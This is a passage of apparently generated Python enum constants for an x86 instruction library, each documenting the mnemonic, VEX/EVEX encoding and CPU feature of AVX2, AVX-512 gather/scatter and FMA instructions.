"""
``VGATHERDPS xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W0 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_YMM_K1_VM32Y: int = 3313
"""
``VGATHERDPS ymm1 {k1}, vm32y``
``EVEX.256.66.0F38.W0 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPS_ZMM_K1_VM32Z: int = 3314
"""
``VGATHERDPS zmm1 {k1}, vm32z``
``EVEX.512.66.0F38.W0 92 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_XMM_K1_VM32X: int = 3315
"""
``VGATHERDPD xmm1 {k1}, vm32x``
``EVEX.128.66.0F38.W1 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_YMM_K1_VM32X: int = 3316
"""
``VGATHERDPD ymm1 {k1}, vm32x``
``EVEX.256.66.0F38.W1 92 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERDPD_ZMM_K1_VM32Y: int = 3317
"""
``VGATHERDPD zmm1 {k1}, vm32y``
``EVEX.512.66.0F38.W1 92 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VGATHERQPS_XMM_VM64X_XMM: int = 3318
"""
``VGATHERQPS xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W0 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPS_XMM_VM64Y_XMM: int = 3319
"""
``VGATHERQPS xmm1, vm64y, xmm2``
``VEX.256.66.0F38.W0 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPD_XMM_VM64X_XMM: int = 3320
"""
``VGATHERQPD xmm1, vm64x, xmm2``
``VEX.128.66.0F38.W1 93 /r``
``AVX2``
``16/32/64-bit``
"""
VEX_VGATHERQPD_YMM_VM64Y_YMM: int = 3321
"""
``VGATHERQPD ymm1, vm64y, ymm2``
``VEX.256.66.0F38.W1 93 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_XMM_K1_VM64X: int = 3322
"""
``VGATHERQPS xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W0 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_XMM_K1_VM64Y: int = 3323
"""
``VGATHERQPS xmm1 {k1}, vm64y``
``EVEX.256.66.0F38.W0 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPS_YMM_K1_VM64Z: int = 3324
"""
``VGATHERQPS ymm1 {k1}, vm64z``
``EVEX.512.66.0F38.W0 93 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_XMM_K1_VM64X: int = 3325
"""
``VGATHERQPD xmm1 {k1}, vm64x``
``EVEX.128.66.0F38.W1 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_YMM_K1_VM64Y: int = 3326
"""
``VGATHERQPD ymm1 {k1}, vm64y``
``EVEX.256.66.0F38.W1 93 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VGATHERQPD_ZMM_K1_VM64Z: int = 3327
"""
``VGATHERQPD zmm1 {k1}, vm64z``
``EVEX.512.66.0F38.W1 93 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PS_XMM_XMM_XMMM128: int = 3328
"""
``VFMADDSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PS_YMM_YMM_YMMM256: int = 3329
"""
``VFMADDSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PD_XMM_XMM_XMMM128: int = 3330
"""
``VFMADDSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 96 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB132PD_YMM_YMM_YMMM256: int = 3331
"""
``VFMADDSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 96 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3332
"""
``VFMADDSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3333
"""
``VFMADDSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3334
"""
``VFMADDSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 96 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3335
"""
``VFMADDSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3336
"""
``VFMADDSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 96 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3337
"""
``VFMADDSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 96 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PS_XMM_XMM_XMMM128: int = 3338
"""
``VFMSUBADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PS_YMM_YMM_YMMM256: int = 3339
"""
``VFMSUBADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PD_XMM_XMM_XMMM128: int = 3340
"""
``VFMSUBADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 97 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUBADD132PD_YMM_YMM_YMMM256: int = 3341
"""
``VFMSUBADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 97 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3342
"""
``VFMSUBADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3343
"""
``VFMSUBADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3344
"""
``VFMSUBADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 97 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3345
"""
``VFMSUBADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3346
"""
``VFMSUBADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 97 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3347
"""
``VFMSUBADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 97 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD132PS_XMM_XMM_XMMM128: int = 3348
"""
``VFMADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PS_YMM_YMM_YMMM256: int = 3349
"""
``VFMADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PD_XMM_XMM_XMMM128: int = 3350
"""
``VFMADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 98 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132PD_YMM_YMM_YMMM256: int = 3351
"""
``VFMADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 98 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3352
"""
``VFMADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3353
"""
``VFMADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3354
"""
``VFMADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 98 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3355
"""
``VFMADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3356
"""
``VFMADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 98 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3357
"""
``VFMADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 98 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADD132SS_XMM_XMM_XMMM32: int = 3358
"""
``VFMADD132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 99 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADD132SD_XMM_XMM_XMMM64: int = 3359
"""
``VFMADD132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 99 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3360
"""
``VFMADD132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 99 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3361
"""
``VFMADD132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 99 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMSUB132PS_XMM_XMM_XMMM128: int = 3362
"""
``VFMSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PS_YMM_YMM_YMMM256: int = 3363
"""
``VFMSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PD_XMM_XMM_XMMM128: int = 3364
"""
``VFMSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9A /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132PD_YMM_YMM_YMMM256: int = 3365
"""
``VFMSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9A /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3366
"""
``VFMSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3367
"""
``VFMSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3368
"""
``VFMSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3369
"""
``VFMSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3370
"""
``VFMSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3371
"""
``VFMSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FMADDPS_ZMM_K1Z_ZMMP3_M128: int = 3372
"""
``V4FMADDPS zmm1 {k1}{z}, zmm2+3, m128``
``EVEX.512.F2.0F38.W0 9A /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFMSUB132SS_XMM_XMM_XMMM32: int = 3373
"""
``VFMSUB132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9B /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMSUB132SD_XMM_XMM_XMMM64: int = 3374
"""
``VFMSUB132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9B /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3375
"""
``VFMSUB132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3376
"""
``VFMSUB132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_V4FMADDSS_XMM_K1Z_XMMP3_M128: int = 3377
"""
``V4FMADDSS xmm1 {k1}{z}, xmm2+3, m128``
``EVEX.LIG.F2.0F38.W0 9B /r``
``AVX512_4FMAPS``
``16/32/64-bit``
"""
VEX_VFNMADD132PS_XMM_XMM_XMMM128: int = 3378
"""
``VFNMADD132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PS_YMM_YMM_YMMM256: int = 3379
"""
``VFNMADD132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PD_XMM_XMM_XMMM128: int = 3380
"""
``VFNMADD132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9C /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132PD_YMM_YMM_YMMM256: int = 3381
"""
``VFNMADD132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9C /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_XMM_K1Z_XMM_XMMM128B32: int = 3382
"""
``VFNMADD132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_YMM_K1Z_YMM_YMMM256B32: int = 3383
"""
``VFNMADD132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3384
"""
``VFNMADD132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_XMM_K1Z_XMM_XMMM128B64: int = 3385
"""
``VFNMADD132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_YMM_K1Z_YMM_YMMM256B64: int = 3386
"""
``VFNMADD132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3387
"""
``VFNMADD132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMADD132SS_XMM_XMM_XMMM32: int = 3388
"""
``VFNMADD132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9D /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMADD132SD_XMM_XMM_XMMM64: int = 3389
"""
``VFNMADD132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9D /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMADD132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3390
"""
``VFNMADD132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMADD132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3391
"""
``VFNMADD132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB132PS_XMM_XMM_XMMM128: int = 3392
"""
``VFNMSUB132PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PS_YMM_YMM_YMMM256: int = 3393
"""
``VFNMSUB132PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PD_XMM_XMM_XMMM128: int = 3394
"""
``VFNMSUB132PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 9E /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132PD_YMM_YMM_YMMM256: int = 3395
"""
``VFNMSUB132PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 9E /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_XMM_K1Z_XMM_XMMM128B32: int = 3396
"""
``VFNMSUB132PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_YMM_K1Z_YMM_YMMM256B32: int = 3397
"""
``VFNMSUB132PS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 3398
"""
``VFNMSUB132PS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 9E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_XMM_K1Z_XMM_XMMM128B64: int = 3399
"""
``VFNMSUB132PD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_YMM_K1Z_YMM_YMMM256B64: int = 3400
"""
``VFNMSUB132PD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 9E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 3401
"""
``VFNMSUB132PD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 9E /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFNMSUB132SS_XMM_XMM_XMMM32: int = 3402
"""
``VFNMSUB132SS xmm1, xmm2, xmm3/m32``
``VEX.LIG.66.0F38.W0 9F /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFNMSUB132SD_XMM_XMM_XMMM64: int = 3403
"""
``VFNMSUB132SD xmm1, xmm2, xmm3/m64``
``VEX.LIG.66.0F38.W1 9F /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SS_XMM_K1Z_XMM_XMMM32_ER: int = 3404
"""
``VFNMSUB132SS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 9F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SD_XMM_K1Z_XMM_XMMM64_ER: int = 3405
"""
``VFNMSUB132SD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 9F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32X_K1_XMM: int = 3406
"""
``VPSCATTERDD vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32Y_K1_YMM: int = 3407
"""
``VPSCATTERDD vm32y {k1}, ymm1``
``EVEX.256.66.0F38.W0 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDD_VM32Z_K1_ZMM: int = 3408
"""
``VPSCATTERDD vm32z {k1}, zmm1``
``EVEX.512.66.0F38.W0 A0 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32X_K1_XMM: int = 3409
"""
``VPSCATTERDQ vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32X_K1_YMM: int = 3410
"""
``VPSCATTERDQ vm32x {k1}, ymm1``
``EVEX.256.66.0F38.W1 A0 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERDQ_VM32Y_K1_ZMM: int = 3411
"""
``VPSCATTERDQ vm32y {k1}, zmm1``
``EVEX.512.66.0F38.W1 A0 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64X_K1_XMM: int = 3412
"""
``VPSCATTERQD vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64Y_K1_XMM: int = 3413
"""
``VPSCATTERQD vm64y {k1}, xmm1``
``EVEX.256.66.0F38.W0 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQD_VM64Z_K1_YMM: int = 3414
"""
``VPSCATTERQD vm64z {k1}, ymm1``
``EVEX.512.66.0F38.W0 A1 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64X_K1_XMM: int = 3415
"""
``VPSCATTERQQ vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64Y_K1_YMM: int = 3416
"""
``VPSCATTERQQ vm64y {k1}, ymm1``
``EVEX.256.66.0F38.W1 A1 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSCATTERQQ_VM64Z_K1_ZMM: int = 3417
"""
``VPSCATTERQQ vm64z {k1}, zmm1``
``EVEX.512.66.0F38.W1 A1 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32X_K1_XMM: int = 3418
"""
``VSCATTERDPS vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32Y_K1_YMM: int = 3419
"""
``VSCATTERDPS vm32y {k1}, ymm1``
``EVEX.256.66.0F38.W0 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPS_VM32Z_K1_ZMM: int = 3420
"""
``VSCATTERDPS vm32z {k1}, zmm1``
``EVEX.512.66.0F38.W0 A2 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32X_K1_XMM: int = 3421
"""
``VSCATTERDPD vm32x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32X_K1_YMM: int = 3422
"""
``VSCATTERDPD vm32x {k1}, ymm1``
``EVEX.256.66.0F38.W1 A2 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERDPD_VM32Y_K1_ZMM: int = 3423
"""
``VSCATTERDPD vm32y {k1}, zmm1``
``EVEX.512.66.0F38.W1 A2 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64X_K1_XMM: int = 3424
"""
``VSCATTERQPS vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W0 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64Y_K1_XMM: int = 3425
"""
``VSCATTERQPS vm64y {k1}, xmm1``
``EVEX.256.66.0F38.W0 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPS_VM64Z_K1_YMM: int = 3426
"""
``VSCATTERQPS vm64z {k1}, ymm1``
``EVEX.512.66.0F38.W0 A3 /vsib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64X_K1_XMM: int = 3427
"""
``VSCATTERQPD vm64x {k1}, xmm1``
``EVEX.128.66.0F38.W1 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64Y_K1_YMM: int = 3428
"""
``VSCATTERQPD vm64y {k1}, ymm1``
``EVEX.256.66.0F38.W1 A3 /vsib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCATTERQPD_VM64Z_K1_ZMM: int = 3429
"""
``VSCATTERQPD vm64z {k1}, zmm1``
``EVEX.512.66.0F38.W1 A3 /vsib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PS_XMM_XMM_XMMM128: int = 3430
"""
``VFMADDSUB213PS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PS_YMM_YMM_YMMM256: int = 3431
"""
``VFMADDSUB213PS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PD_XMM_XMM_XMMM128: int = 3432
"""
``VFMADDSUB213PD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W1 A6 /r``
``FMA``
``16/32/64-bit``
"""
VEX_VFMADDSUB213PD_YMM_YMM_YMMM256: int = 3433
"""
``VFMADDSUB213PD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W1 A6 /r``
``FMA``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PS_XMM_K1Z_XMM_XMMM128B32: int = 3434
"""
``VFMADDSUB213PS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 A6 /r``
